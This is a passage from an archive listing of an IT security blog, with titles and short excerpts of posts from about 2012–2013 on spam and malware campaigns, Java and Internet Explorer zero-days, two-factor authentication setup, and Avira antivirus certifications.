and Plus.de. Cybercriminals are sending again personalized emails in the German language pretending - [Avira Server Security is Windows Server 2012 certified](https://www.sorinmustaca.com/avira-server-security-is-windows-server-2012-certified/) - Following the certification of Avira Free Antivirus and Avira Premium Security, we are happy to announce you that the Avira Server Security obtained the certification for Windows Server 2012. You can download and test the product from here. Sorin Mustaca Product Manager via Avira - TechBlog http://techblog.avira.com/2013/05/16/avira-server-security-is-windows-server-2012-certified/en/ - [Make your ownCloud](https://www.sorinmustaca.com/make-your-owncloud/) - No, there is no error in the title. I am talking about making your own cloud solution using the software called ownCloud. Make your own cloud If you don’t like to have your private data stored somewhere on a server in the world, then probably your only solution is to use an USB - [Be aware of fake Facebook extensions](https://www.sorinmustaca.com/be-aware-of-fake-facebook-extensions/) - We have received from our partners in the AV industry reports about malicious browser extensions trying to hijack Facebook profiles. According to Microsoft, this threat was first discovered in Brazil but because of the social engineering techniques it uses, it spread fast in other countries and languages as well. All Avira products detect it as TR/Febipos.B.2. - [A new ransomware trojan variant with children pornography](https://www.sorinmustaca.com/a-new-ransomware-trojan-variant-with-children-pornography/) - We wrote about the ransomware trojan (aka BKA Trojan) and its new methods of blackmailing people to pay: claim in the name of an official institution that the user did something illegal, like storing children pornography pictures on his computer. The new variant of the BKA trojan attempts to blackmail the owners of infected computers with four - [@IT_SecurityNews and @SorinMustaca Twitter accounts suspended (updated)](https://www.sorinmustaca.com/it_securitynews-and-sorinmustaca-twitter-accounts-suspended/) - Today, Twitter decided that they don't like my accounts @IT_SecurityNews and @SorinMustaca anymore and they suspended them. I can't post anything there for the moment... The accounts were automatically fed by TwitterFeed from many RSS feeds. I asked Twitter why was it suspended and I'll get back with their feedback. - [How to protect your social media account](https://www.sorinmustaca.com/how-to-protect-your-social-media-account/) - You’ve heard in the press that many celebrities and companies got their social media accounts hacked. Twitter even issued an official warning to all press agencies to protect their accounts better. Here are useful tips how to easily protect your account: 1. Protect your social media account with a strong password. Here are some - [Avira Premium Antivirus is Windows 8 certified](https://www.sorinmustaca.com/avira-premium-antivirus-is-windows-8-certified/) - As previously announced, we continue to improve the compatibility with Windows 8 of our products. After the Free Antivirus certification, we are happy to inform you that Avira Antivirus Premium is the next Avira product which is Windows 8 certified. The certification of the other products will follow in the next weeks. But don’t worry, all other products - [Planned cyberattack attack against the USA infrastructure](https://www.sorinmustaca.com/planned-cyberattack-attack-against-the-usa-infrastructure/) - After the #OpIsrael against Israel cyberspace, anonymous hackers called themselves “N4m3le55 Cr3w” announced that they have scheduled another cyber attack on USA based websites and servers on 07/05/2013. In the above mentioned text it is also explain what the reason for the attack is: “war crimes in Iraq, Afghanistan and Pakistan“. Also noteworthy is that the activists also explain which means - [New movies, same old malware tricks](https://www.sorinmustaca.com/new-movies-same-old-malware-tricks/) - You probably don’t live on this planet if you haven’t seen at least the trailers from these two movies. And, from curiosity, there is only one step to social engineering for the masses. Iron Man 3 and Star Trek – Into Darkness are the titles that make the news these days. It didn’t - [Emails containing fake invoices from Apple and Plus.de distribute malware](https://www.sorinmustaca.com/emails-containing-fake-invoices-from-apple-and-plus-de-distribute-malware/) - The German users should be aware of a massive spam campaign with emails pretending to come from Apple and Plus.de (discounter) containing a invoice of a good they bought from their shop. The so called invoice is in a ZIP archive containing a … SCR file. SCR is the classical extension for screen saver programs - [Quoted in the Spanish magazine ElConfidencial.com](https://www.sorinmustaca.com/quoted-in-the-spanish-magazine-elconfidencial-com/) - Cinco pistas para descubrir que han 'hackeado' tu 'smartphone' Click here for the Google Translation. Sorin Mustaca, experto en seguridad IT de Avira, ha explicado a Teknautasque "el malware normalmente envía información a los cibercriminales, lo que implica un aumento en el uso de datos. Si su proveedor le ha rebajado la velocidad de transmisión es porque está - [Signs that your smartphone is potentially infected with malware](https://www.sorinmustaca.com/signs-that-your-smartphone-is-potentially-infected-with-malware/) - 1. You notice that you pay more than usual for your mobile phone bill This is a sign that some trojan might send SMSs or make phone calls to super expensive phone numbers oversees. 2. Data usage increase Malware usually sends data to the cybercriminals. If you notice an increase in the data usage or - [ENISA's Innovative tools for creating an engaging user awareness programme](https://www.sorinmustaca.com/enisas-innovative-tools-for-creating-an-engaging-user-awareness-programme/) - ENISA -the European Network and Information Security Agency, working for the EU Institutions and Member States. ENISA is the EU’s response to these cyber security issues of the European Union. As such, it is the 'pace-setter' for Information Security in Europe, and a centre of expertise. The objective is to make ENISA’s web site the European - [Quoted in Softpedia about browser security](https://www.sorinmustaca.com/quoted-in-softpedia-about-browser-security/) - Source of the article: http://www.softpedia.com/reviews/windows/Google-Chrome-Review-345916.shtml Another aspect pointed out by Avira’s Security Product Manager Sorin Mustaca is Google’s effort to keep their browser safe. “Especially when we are talking about the Chrome browser, we have the already famous hacking sessions, which Google organizes to find vulnerabilities in the browser. This shows how important the security is for - [Botnet attack on WordPress](https://www.sorinmustaca.com/botnet-attack-on-wordpress/) - Over the past two week, we have been tracking an alarming brute force password-guessing attacks against Web sites powered by WordPress – the most popular content management system in use today (Avira Techblog also runs WordPress). You can see below how various IP addresses (in my example from China) try to connect to the known - [Raspberry PI has video](https://www.sorinmustaca.com/raspberry-pi-has-video/) - I bought a webcam in order to extend my RPi capabilities. The longterm plan is to have a Skype running on it also with video. Skype doesn't run on RPi ... yet. But maybe I am able to use something different. This is how I did it: 1. Buy the Logitech C270 USB HD - [When Cupid brings malware instead of love](https://www.sorinmustaca.com/when-cupid-brings-malware-instead-of-love/) - We have started to see in Germany a massive spam campaign that spreads malware in form of a classical “russian bride” spam. Written in a more than questionable German language, the emails contains confusing sources. The From field mentions a name, the author of the email is another one and the contact email address in the - [Enable two-factor authentication for the SSH on your Raspberry PI](https://www.sorinmustaca.com/enable-two-factor-authentication-for-the-ssh-on-your-raspberry-pi/) - I am a big fan of RPi and I allowed one of my RPis (I have 3) to be accessible from the Internet via SSH. But, I was stressed because somebody might do a DoS on my device with the intent to hack into it and this way would prevent me to access it. So, - [Avira Free Antivirus is Windows 8 certified](https://www.sorinmustaca.com/avira-free-antivirus-is-windows-8-certified/) - As previously announced, we continue to improve the compatibility with Windows 8 of our products. We are happy to inform you that Avira Free Antivirus is the first Avira product which is Windows 8 certified. The certification of the other products will follow in the next few weeks. But don’t worry, all other products for - [Pharmacy spam for the “Zombie Apocalypse”](https://www.sorinmustaca.com/pharmacy-spam-for-the-zombie-apocalypse/) - You probably have heard about the prank done to a television from Montana, USA in February. Their emergency channel got hacked (exact details about how the hacking occurred were not made public so far) and a message about zombies was communicated via voice and text: Civil authorities in your area have reported that the bodies of - [Apple adds two-factor authentication](https://www.sorinmustaca.com/apple-adds-two-factor-authentication/) - Remember our series about how to activate two-factor authentication in Google, Dropbox and Facebook? We are happy to inform you that Apple finally decided to join the club of companies who care about the security of its customers and started to rollout two-factor authentication. You can set it up here if you are living in - [When the spammer offers you to sell his ads](https://www.sorinmustaca.com/when-the-spammer-offers-you-to-sell-his-ads/) - I received the spam below from a company called Media Discovery (a New Web Ltd company). They want me to sell them advertising space on this domain. I was wondering whether you'd be interested in selling advertising space on sorin-mustaca.com? Wow... but advertising for what? The advertisement would be unobtrusive and we can pay you an - [20 Security tips for a safer 2013](https://www.sorinmustaca.com/20-security-tips-for-a-safer-2013/) - Here are all 20 tips we published in the last months. All pictures for the Facebook posts are available here. 1. Never open attachments from an email. Email was not invented for sending files and definitely not programs or archives with programs in them. Also pictures in emails are pretty deceiving because they might mask malicious actions. - [Evernote hacked – all users have to change passwords](https://www.sorinmustaca.com/evernote-hacked-all-users-have-to-change-passwords/) - This is how the nightmare of having a bad press starts: Evernote’s Operations & Security team has discovered and blocked suspicious activity on the Evernote network that appears to have been a coordinated attempt to access secure areas of the Evernote Service. As a precaution to protect your data, we have decided to implement a - [AirPi #1: set up AirPi on your RaspberryPi running Raspbian](https://www.sorinmustaca.com/airpi-1-set-up-airpi-on-your-raspberrypi-running-raspbian/) - Initial source: http://trouch.com/2012/08/03/airpi-airplay-audio-with-raspberry/ What is AirPi? AirPi is the RaspberryPi implementation of Apple's protocol called AirPlay. Using AirPlay you can send audio and video streaming from you Apple Device (ipad, iPod, iPhone, Mac) to RaspberryPi. This implementation is sending only the sound. Why all this trouble? Do you know those expensive devices called Sonos? I - [Avira Anwender sind vor der Malware „MiniDuke“ geschützt](https://www.sorinmustaca.com/avira-anwender-sind-vor-der-malware-miniduke-geschutzt/) - Sie haben bestimmt schon von der neuen Malware gehört, die gerade die Zero-Day-Schwachstelle in der PDF-Software von Adobe ausnutzt. Dieses Schadprogramm namens “MiniDuke” entwickelt sich allmählich zum Alptraum eines jeden Unternehmens: Es ist polymorph; das heißt, es gibt unzählige Varianten des Schädlings. Es nutzt die Sicherheitslücke einer sehr beliebten Software aus: Adobe Reader. Das Programm - [Avira users are protected against the MiniDuke Malware](https://www.sorinmustaca.com/avira-users-are-protected-against-the-miniduke-malware/) - If you live on this planet, you must have definitely have heard of the new malware that is making use of a zero-day vulnerability in Adobe Reader. This malware is called MiniDuke, and it is slowly but surely becoming the nightmare of any company: it is polymorphic – there are thousands of variants in the - [Microsoft, Apple, Facebook victims of Java exploits](https://www.sorinmustaca.com/microsoft-apple-facebook-victims-of-java-exploits/) - We wrote several times that when Oracle fixed quickly the security holes in Java, it did not have enough time to address the source of the problem. This can be now seen more clear after big names in the IT industry like Microsoft, Apple and Facebook felt victims to Java exploits. - [The BKA Trojan still spreading through emails containing fake invoices](https://www.sorinmustaca.com/the-bka-trojan-still-spreading-through-emails-containing-fake-invoices/) - Even though the fraudsters behind the BKA Trojan (aka Ransom Trojan) have been caught by the police, there are still a lot of emails spreading the Trojan in circulation. One of these emails drew my attention because it was addressed directly to me and because of the way in which it is constructed. The email - [Improve your security #11: Enable two-factor authentication](https://www.sorinmustaca.com/improve-your-security-11-enable-two-factor-authentication/) - It might sound complicated, but remember that with more security the usability (how easy is to use the service) always suffers a little bit. The reward at the end is that you can sleep in peace that nobody will enter in your universe unless you want that. We have published a couple of articles in - [How would you describe yourself?](https://www.sorinmustaca.com/how-would-you-describe-yourself/) - Your LinkedIn profile can tell someone a lot about you. But, what are your strongest skills? How could you describe yourself in a few words? Here is how: create a cloud of words from your profile enhancing the words that appear most. Here are more of - [Official contributor in the (ISC)2 Blog](https://www.sorinmustaca.com/official-contributor-in-the-isc2-blog/) - With the third article published in the (ISC)2 Blog I was accepted as an official contributor in the (ISC)2 Blog. Here is a link to all my articles: http://blog.isc2.org/isc2_blog/mustaca/index.html Here is a link to my biography: http://blog.isc2.org/isc2_blog/authors.html#mustaca - [Define S.M.A.R.T IT security goals](https://www.sorinmustaca.com/define-s-m-a-r-t-it-security-goals/) - One of the biggest problem that most IT security experts around the world have is the fact that IT security is never taken seriously until a security incident takes place. After that, management boards start being interested in IT security. However, these managers see security not through the eyes of an expert, but through the - [Improve your security #10: Make backups](https://www.sorinmustaca.com/improve-your-security-10-make-backups/) - It is said that three things are certain in life: we are born, we pay taxes and we die. Adding a little bit of IT facts on top of this, I can add a fourth certain thing: hardware fails. It is only a question of when and not if it fails. And when it fails, you want - [Didn’t you uninstall Java already?](https://www.sorinmustaca.com/didnt-you-uninstall-java-already/) - If you didn’t uninstall it, then think again about this. Here is how to uninstall or deactivate Java from your system. Oracle has announced that they fixed with the update on February 1st only a part of the problems originally planned to be fixed. The second part of the problems will be fixed with the - [Security 101: February 2013](https://www.sorinmustaca.com/security-101-february-2013/) - Nowadays, a lot of people are shopping online. To do that, they greatly rely on internet banking. What precautionary steps or systems are used to make sure users have a secure transaction? The most important thing to do is to make sure that your computer is not infected with malicious software. For this, you will - [Was BusinessWire also hacked?](https://www.sorinmustaca.com/was-businesswire-also-hacked/) - I received the following email from BusinessWire.com which makes me think that they got somehow hacked and are forcing all users to change their password. I couldn't see anything on their website, also Google didn't provide anything useful. We will be requiring all Businesswire.com users to change their password in the next few days. This maintenance is - [Old Facebook likejacking scam in use again: “[SHOCKING] At 14, she did that in the public school”](https://www.sorinmustaca.com/old-facebook-likejacking-scam-in-use-again-shocking-at-14-she-did-that-in-the-public-school/) - We wrote last year a couple of times about Facebook likejacking scams. A likejacking scam is an attempt to lure Facebook users to click on a post in order to see something very interesting. For example, “Dad walks in on Daughter… Embarrassing” , „This spider is brutal“, “Who visited your Facebook Profile”, “I Will NEVER TEXT Again After - [(ISC)2 Blog post: Vulnerability disclosure: a new business model?](https://www.sorinmustaca.com/isc2-blog-post-vulnerability-disclosure-a-new-business-model/) - Original: http://blog.isc2.org/isc2_blog/2013/01/vulnerability-disclosure-a-new-business-model.html We all see in the mass media every day that software is vulnerable and that this is bad. But, few know what is happening behind the scene, until the news get out. There are two ways to disclosure a vulnerability: the most common one is to make a “full disclosure”, but there is - [The BKA/Ransom Trojan comes now with child pornography](https://www.sorinmustaca.com/the-bkaransom-trojan-comes-now-with-child-pornography/) - The so called “BKA Trojan” (BKA stands for German Federal Criminal Police) malware which is also known as the Ransom trojan in other countries, has found a more convincing way to fool computer users to pay. Now, together with other eight possible misdeeds, the user is accused of hosting and distributing child pornography materials from his computer. - [Security update for Apple: iOS 6.1 fixes browser flaws](https://www.sorinmustaca.com/security-update-for-apple-ios-6-1-fixes-browser-flaws/) - Apple has released a new version of iOS, the operating system that powers the iPhone, iPad, iPod. The new version fixes 20 security flaws related to the Safari browser. Some of the vulnerabilities were allowing bypassing of authentication, cross-site scripting attacks, privilege escalations, arbitrary code execution, memory corruptions. Last but not least, the compromised Türktrust certificates were revoked. - [Malware delivered with fake hotel reservations](https://www.sorinmustaca.com/malware-delivered-with-fake-hotel-reservations/) - We wrote last week about Malware delivered with fake Craigslist fax-to-email notifications.This week’s malware delivery mechanism is a fake email notification from the well-known online hotel reservations portal booking.com. The malware is delivered when you click on “Print Booking Details” via an archive which should contain the form with the reservation details. In order - [Quoted on Softpedia.com: Bogus eFax Corporate Emails from Craigslist Carry Malware](https://www.sorinmustaca.com/quoted-on-softpedia-com-bogus-efax-corporate-emails-from-craigslist-carry-malware/) - Cybercriminals are using a combination of social engineering tactics to trick users into opening malware-spreading emails. Avira experts have come across emails that appear to come from Craigslist, but sent via eFax Corporate. The messages, which have nothing to do with either Craigslist or eFax, inform recipients that they’ve received a 24-page fax. However, researchers - [Duplicati: a gratis tool to perform encrypted incremental backups (in German)](https://www.sorinmustaca.com/duplicati-a-gratis-tool-to-perform-encrypted-incremental-backups-in-german/) - http://www.searchsecurity.de/specials/security_corner/articles/391962 This is my first article on SearchSecurity.de's Security Corner, but definitely not the last one. I will publish soon the English version as well. - [Malware delivered with fake Craigslist fax-to-email notifications](https://www.sorinmustaca.com/malware-delivered-with-fake-craigslist-fax-to-email-notifications/) - If you receive such a message containing an HTML page attached, don’t open it. The email pretends to come from “craigslist – automated message, do not reply ” and has the subject ”Efax Corporate”. What I find interesting is that the fraudsters didn’t even bother to write JS code to detect if the script runs in - [Added in searchsecurity.de (ISC)2 Corner](https://www.sorinmustaca.com/added-in-searchsecurity-de-isc2-corner/) - http://www.searchsecurity.de/specials/security_corner/isc2/ My cooperation with SearchSecurity.de is finally showing something. I was addded on the (ISC)2 Security Corner: Sorin Mustaca, Avira Operations GmbH & Co. KG Sorin Mustaca, (ISC)²-zertifizierter CSSLP, CompTIA Security+,Project+, ist seit 2000 in der IT Sicherheitsindustrie und seit 2003 bei Avira tätig. - [Be aware of fake Java patches for the zero-day exploits](https://www.sorinmustaca.com/be-aware-of-fake-java-patches-for-the-zero-day-exploits/) - We and pretty much the rest of IT world, have written about the Java zero-day exploit, about the fast patch that Oracle release to remove some of the market pressure and also about the fact that such a quick move can only mean that even more bugs were probably introduced, which might lead to other - [More quotes of me about the Java zero-day exploit](https://www.sorinmustaca.com/more-quotes-of-me-about-the-java-zero-day-exploit/) - "Developing critical software under pressure has only one consequence -- even more bugs," said Avira data security expert Sorin Mustaca. "I expect to soon see even more bugs and vulnerabilities related to this quick fix." http://www.linuxinsider.com/story/77079.html http://www.technewsworld.com/story/77079.html http://www.torontotelegraph.com/index.php/sid/211938962/scat/ebc9d7769bc0759e http://www.ecommercetimes.com/story/security/77079.html http://www.macworld.com/article/2025137/security-agency-recommends-disabling-java-due-to-exploit.html http://www.csoonline.com/article/726380/us-cert-disable-java-in-browsers-because-of-exploit http://www.cio.com/article/726307/US_CERT_Disable_Java_in_browsers_because_of_exploit http://www.computerworld.com/s/article/9235615/US_CERT_Disable_Java_in_browsers_because_of_exploit http://www.businesswire.com/news/home/20130114005440/en/Avira-Security-Software-Detects-Java-7-Exploits http://www.latinospost.com/articles/9642/20130115/java-flaw-patch-now-available-download-experts.htm OMG.. my blog posts start to sound - [Pharma spam using LinkedIn again](https://www.sorinmustaca.com/pharma-spam-using-linkedin-again/) - We wrote a couple of times already about spams pretending to come from LinkedIn which advertise online pharmacy websites. There is a new spam campaign which changed a bit the way the messages are presented to the users. Now the emails pretend to come from “LinkedIn Co. Technical Support”, “LinkedIn Co. Administration” and from “LinkedIn Reminders”. - [Yet a new Java zero-day exploit?](https://www.sorinmustaca.com/yet-a-new-java-zero-day-exploit/) - We don’t know yet if this is a bad joke intended to discredit Oracle and Java, but the media is buzzing about a possible new undetected exploit in Java. This was started by a post of the security researcher Brian Krebs who observed a thread in a known online crime forum where somebody was selling - [Quoted in Oracle Journal about the Java zero day exploit](https://www.sorinmustaca.com/quoted-in-oracle-journal-about-the-java-zero-day-exploit/) - Source: http://oracle.sys-con.com/node/2510668 Avira Security Software Detects Java 7 Exploits “Whenever a vulnerability like this is discovered – especially when it is in a widely distributed software like Java – the bad guys are quick to write exploits that take advantage of the flaw,” said Sorin Mustaca, IT security expert at Avira. “While Oracle ultimately needs - [The PC is dead, long live the PC](https://www.sorinmustaca.com/the-pc-is-dead-long-live-the-pc/) - If you have read news lately, you couldn’t have missed hearing how well the tablets, smart phones and smart TVs are selling, and how badly the PC market (excluding laptops) is doing. Many so called “futurists” have predicted the passing of the PC era. But is it really gone? Is the Personal Computer really dead, - [Q&A over Oracle's Java in regard to the zero-day exploit](https://www.sorinmustaca.com/qa-over-oracles-java-in-regard-to-the-zero-day-exploit/) - 1. This is your standard take-victims-to-a-malicious-Web-page kind of attack. Why the excitement? Because of the high danger of the breach? What? This vulnerability in Java is the second one in the last 6 months (first one on August 29, 2012). The problem with Java is that it is cross platform and it is installed on - [How to enable two-factor authentication for Facebook](https://www.sorinmustaca.com/how-to-enable-two-factor-authentication-for-facebook/) - Facebook has introduced some time ago two-factor authentication for Login. This means that if someone or something tries to login using your account, there will be two steps needed: authentication using username and password (something that you know) and a mobile phone (something that you have). Step 1 Set up the two-step authentication - [Articles about Java zero-day exploit](https://www.sorinmustaca.com/articles-about-java-zero-day-exploit/) - http://www.technewsworld.com/story/77079.html Oracle rushed out a patch for a Java flaw that was so serious the U.S. government advised users to uninstall the software. The fix might have come too quickly, however. "Developing critical software under pressure has only one consequence -- even more bugs," said Avira data security expert Sorin Mustaca. "I expect to soon - [How to disable the Java web plug-in in all browsers](https://www.sorinmustaca.com/how-to-disable-the-java-web-plug-in-in-all-browsers/) - We have written about Java and its regular vulnerabilities, two (here and here) of which were zero-day vulnerabilities. Java is a very strong tool because it is cross platform and if a vulnerability is being found on one platform, it can easily be found on all others. If used used properly, Java can provide an - [Oracle has fixed the Java zero-day exploit](https://www.sorinmustaca.com/oracle-has-fixed-the-java-zero-day-exploit/) - After the huge media impact that followed up the full disclosure of the vulnerability in Java 7 Update 10, many national and international organizations have started to recommend to their readers to uninstall Java (Germany’s BSI, US-Cert). Oracle couldn’t just stand and see how their market share is disappearing and has started over the weekend - [YAJZE: Yet another Java Zero-Day Exploit](https://www.sorinmustaca.com/yajze-yet-another-java-zero-day-exploit/) - Unfortunately, it is really the case to say that Java has “yet another zero-day exploit”. The latest version of Java, v7 Update 10 is affected and currently there is no plan for a patch. The vulnerability which is already used in online attacks is a code injection onto a fully patched Windows system running the - [How to set up Dropbox’s two-factor authentication](https://www.sorinmustaca.com/how-to-set-up-dropboxs-two-factor-authentication/) - We introduced the two-factor authentication, or two-step authentication how Dropbox calls it, and why it is necessary. Here is how you do this for Dropbox: Step 1: 1. Go to Settings -> Security 2. Click on “(change)” on the “Two-Step verification” IMPORTANT: There seems to be a bug in the web application of Dropbox because as - [How to create secure passwords](https://www.sorinmustaca.com/how-to-create-secure-passwords/) - I started a cooperation with Kafka communication which publishes my articles in German to various publications. Here is the first one (3 pages): Wie erstelle ich sichere Passwörter? PS: The translation in German doesn't belong to me. - [Security updates from Adobe, Mozilla, Microsoft, NVIDIA, Asterisk](https://www.sorinmustaca.com/security-updates-from-adobe-mozilla-microsoft-nvidia-asterisk/) - The year is starting with a lot of pressure for Adobe, Mozilla, Microsoft, NVIDIA and Asterisk which had to push security updates to fix several critical security vulnerabilities. Microsoft has released their monthly patch containing seven bulletins which close 12 security problems rating as Critical and Important. All versions of Windows are affected, including Windows 8 - [How to set up Google’s two-factor authentication](https://www.sorinmustaca.com/how-to-set-up-googles-two-factor-authentication/) - We introduced the two-factor authentication, or two-step authentication how Google calls it, and why it is necessary. Here is how you do this for Google’s services, email in particular: Step 1 1. Start on this page. 2. Click on the “Get Started” You will be asked to login using the user name and - [Managing Startups: Best Posts of 2012 (guest post)](https://www.sorinmustaca.com/managing-startups-best-posts-of-2012-guest-post/) - Original article: http://platformsandnetworks.blogspot.ca/2012/12/managing-startups-best-posts-of-2012.html Author:Tom Eisenmann Lean Startup David Aycan of IDEO on the value of prototyping multiple MVPs in parallel. Vin Vacanti on excuses that kept Yipit from launching early. Entrepreneur Graeham Douglas on lean techniques for rapid prototyping of physical products. Emre Sokullu of GROU.PS on software that is well suited for building MVPs. Ben Yoskovitz of GoInstant - [Problems with Wordpress lately and the importance of doing backups](https://www.sorinmustaca.com/problems-with-wordpress-lately-and-the-importance-of-doing-backups/) - In case you wonder why the post about Raspberry Pi has disappeared, I am having big problems with the Wordpress installation on sorin-mustaca.com. I am getting errors from the database (MySQL) telling me that the table wp_posts is in use... But actually the table doesn't exist anymore. WordPress database error File './sorin_wrdp1/wp_posts.MYD' not found (Errcode: - [A further step into achieving Windows 8 compatibility](https://www.sorinmustaca.com/a-further-step-into-achieving-windows-8-compatibility/) - As previously announced, we continue to improve the compatibility with Windows 8 of our products. We have started yesterday the rollout of a new update for all our products in version 2013 which improves the compatibility with Windows 8 even more. Avira Free AntiVirus build 2890 Avira AntiVirus Premium 2013 build 2890 Avira Internet Security - [Security tips for safe online shopping](https://www.sorinmustaca.com/security-tips-for-safe-online-shopping/) - During the holidays season many people receive packages from the post or delivery services. We wrote about the dangers introduced by opening attachments in emails pretending to come from such entities. Without an active and up to date security software, attachments in email should never be open, no matter from where they come. We also - [The post might not bring exactly what you expect for Christmas](https://www.sorinmustaca.com/the-post-might-not-bring-exactly-what-you-expect-for-christmas/) - With the holidays and presents season approaching, most of us are thinking what presents to order for Christmas. Many people prefer to order them online than to spend hours chasing presents in a mall. I know I am one of those… This fact is also known by cyber criminals who are doing anything to get - [Security 101: December 2012](https://www.sorinmustaca.com/security-101-december-2012/) - How safe is internet banking when I am using a smartphone to do it? I noticed several banks provided apps to do mobile internet banking and share trading but does it really work? Smartphones have much limited security functionality than desktops. However, they do share one weakness: they are both equally exposed to external attacks if they transmit non-encrypted data over non-encrypted Internet - [Post Cyber Monday thoughts](https://www.sorinmustaca.com/post-cyber-monday-thoughts/) - Now that the Cyber Monday and Black Friday madness of buying at reduced prices is almost over, we expect to see the spam and scam campaigns related to these events. Every year, in the last week of November the two events bring into our inboxes a lot of spam and scams trying to make use - [Quoted on Softpedia.com: Penny Stocks Spam Influences Trading Volume Once Again, Experts Find](https://www.sorinmustaca.com/quoted-on-softpedia-com-penny-stocks-spam-influences-trading-volume-once-again-experts-find/) - Security experts from Avira warn users that penny stocks spam messages are making the rounds once again in an attempt to convince recipients into investing with a certain company. The latest messages – entitled “It Should Resume Uptrend,” “It Becomes Our Latest Double,” “The best is yet to come” or “This is Ready to Explode” - [Security 101: November 2012](https://www.sorinmustaca.com/security-101-november-2012/) - How can we find out if we are really secure when we’re using online banking? There is no way to be really secure. However, there are ways to reduce the risk to a minimum acceptance level. Just ensure the following have been fulfilled: - If you use wireless to access the network, make sure that you use an encrypted - [Peny-stocks spams…again](https://www.sorinmustaca.com/peny-stocks-spamsagain/) - We all hoped about 5 years ago that this is over: after email-spam advertising penny-stocks, improved spam-campaigns using images, then trials to beat OCR detection with noise in and angle changes of the images, and finally closing with PDF-based penny-stock-spam. The latest version of this pest has titles like “The best is yet to come”, - [Avira Server Security awarded VB100 on Windows Server 2003 R2](https://www.sorinmustaca.com/avira-server-security-awarded-vb100″-on-windows-server-2003-r2/) - We are very proud to announce that Avira received again the “VB100? award, offered by the Virus Bulletin magazine. The results of the tests performed with 36 products on Windows Server 2003 R2 were published on their website (registration required). With this award, Avira receives its 12 award in a row in the last two years and the stable ranking. Virus - [Avira and the compatibility with Windows 8](https://www.sorinmustaca.com/avira-and-the-compatibility-with-windows-8/) - Microsoft released Windows 8 on October 26, 2012. Historically, Microsoft has always had a certification process with different levels for the software running on its operating system. These levels are “Compatible with …” and “Designed for …”. In order to achieve these compatibility levels, there are many changes which need to be implemented by the software. - [Security 101: October 2012](https://www.sorinmustaca.com/security-101-october-2012/) - As previously announced, we continue to answer questions received from the readers of the PC.COM magazine. Are there any signs telling us if our computer has been hacked or compromised? Usually, if your computer is performing strangely, this is a good sign of being infected with malware. “Strange” can mean one or more of - [Guest post: Agile Product Ownership in a nutshell](https://www.sorinmustaca.com/guest-post-agile-product-ownership-in-a-nutshell/) - Credits: Imported from : http://blog.crisp.se/2012/10/25/henrikkniberg/agile-product-ownership-in-a-nutshell#comment-3697 Author: Henrik Kniberg Company: Crisp There’s obviously more to product ownership than this, so see this is a high level summary. Download the complete drawing here. I recommend watching the video instead of reading the transcript from the source URL. The video is 100% visual, the transcript is 0% visual… http://www.youtube.com/watch?v=502ILHjX9EE&hd=1 - [How to disable advertisers tracking in iOS 6](https://www.sorinmustaca.com/how-to-disable-advertisers-tracking-in-ios-6/) - Apple released in September 2012 the new iOS 6 together with the iPhone 5. We’ve seen quite a lot of advertisements about how good and great the iOS 6 is. No doubt, it is good, but not all new ”things” were advertised. For example, Apple didn’t say a word about the new feature called Identifier For Advertisers (IFA or - [Dear reader, who are you?](https://www.sorinmustaca.com/dear-reader-who-are-you/) - One of the problems of the today’s online world is the fact that from far away, people are only just statistics in a dashboard. You don’t know actually who your readers or visitors are, what are their needs, their wishes, their thoughts. We want to make the Techblog better, so that it suits your needs. - [1000 Contacts](https://www.sorinmustaca.com/1000-contacts/) - I finally reached 1000 contacts on LinkedIn. Why "finally" ? Because it took me more than 10 years to reach this ... Why do I do want to have so many contacts? Because : I like to be networked I think that I deliver a value to my contacts - the IT_SecurityNews Twitter feed which - [Avira is now in the Facebook AV Marketplace](https://www.sorinmustaca.com/avira-is-now-in-the-facebook-av-marketplace/) - Facebook launched six month ago the AV Marketplace and according to the company, they had over 30 million views. Since yesterday, 15.10.2012, Avira is also present there with two solutions: For PC – Avira Free Antivirus and for Mac, Avira Free Mac Security. Make sure that once you visit the page you search for the Avira solutions. The - [Security 101: September 2012](https://www.sorinmustaca.com/security-101-september-2012/) - As previously announced, we continue to answer questions received from the readers of the PC.COM magazine. Right now I am using licensed Avira Internet Security, how do I know that my computer is really safe from Trojan, virus, malware, spyware, etc. However, there was a time when I plugged in a flashdrive with an apparent virus into - [Facebook myths and fakes](https://www.sorinmustaca.com/facebook-myths-and-fakes/) - There is not a single week when we don’t see a new Facebook scam. We name scam everything that tries to fool the user to do something which he usually wouldn’t do or shouldn’t do: click on something – called also clickjacking “like” something – called also likejacking pay for something which is free pay - [Quoted on Softpedia.com: Avira 2013 Upgrades are Free of Charge](https://www.sorinmustaca.com/quoted-on-softpedia-com-avira-2013-upgrades-are-free-of-charge/) - Avira launched the 2013 product line back in late September. Now, the German company kicks off an upgrade campaign to the newest versions. As an incentive for the users to make the move, Avira is offering the upgrade free of charge.In order to proceed with updating to the most recent versions users have to receive - [The Avira Techblog has two languages from now on](https://www.sorinmustaca.com/the-avira-techblog-has-two-languages-from-now-on/) - Apparently, many German Facebook fans of Avira have difficulties reading English. Because of this reason, we have created a special page for them: http://www.facebook.com/avira.german. Today, I have created also in the Techblog a German area which is available here: http://techblog.avira.com/de Now it is pretty lonely there, but we will add more articles soon. - [Upgrade your Avira product to the version 2013 free of charge](https://www.sorinmustaca.com/upgrade-your-avira-product-to-the-version-2013-free-of-charge/) - Starting yesterday, we have initiated for all version 2012 users the upgrade campaign to version 2013. If you receive a message like the one in the picture below, just click on it and upgrade to your desired product. Do not forget that the upgrade is free of charge! If you have any questions, please - [Microsoft fixes the IE zero-day exploit](https://www.sorinmustaca.com/microsoft-fixes-the-ie-zero-day-exploit/) - We have published information about the IE zero-day exploit which affected IE version 6 to 9 on all operating systems on which it is available. Not surprisingly, Microsoft announced today that they have a fix for this problem even before the cumulative patch on Friday, September 21st. If you have automatic updates enabled on our PC, you won’t need - [Avira Techblog: Zero-Day exploit in Internet Explorer](https://www.sorinmustaca.com/avira-techblog-zero-day-exploit-in-internet-explorer/) - It appears that another exploit is being actively used to install malware. This time, it appears that there is an exploit in Internet Explorer versions 6 to 9. This means, that all Windows operating systems until Windows 8 are affected. Microsoft has acknowledged in the Security Advisory (2757760) that there is a problem and that they are - [Avira Techblog: Fake LinkedIn emails pointing to online pharmacy websites](https://www.sorinmustaca.com/avira-techblog-fake-linkedin-emails-pointing-to-online-pharmacy-websites/) - We have written many times already about fake LinkedIn emails which lead most of the time to online pharmacy websites and possibly to also infected websites. The latest spams, similar to those we already wrote about, are pretending to come from LinkedIn Reminders and have a subject like “There are a total of messages - [Avira Techblog: Back-to-School tips for online safety](https://www.sorinmustaca.com/avira-techblog-back-to-school-tips-for-online-safety/) - Now that kids 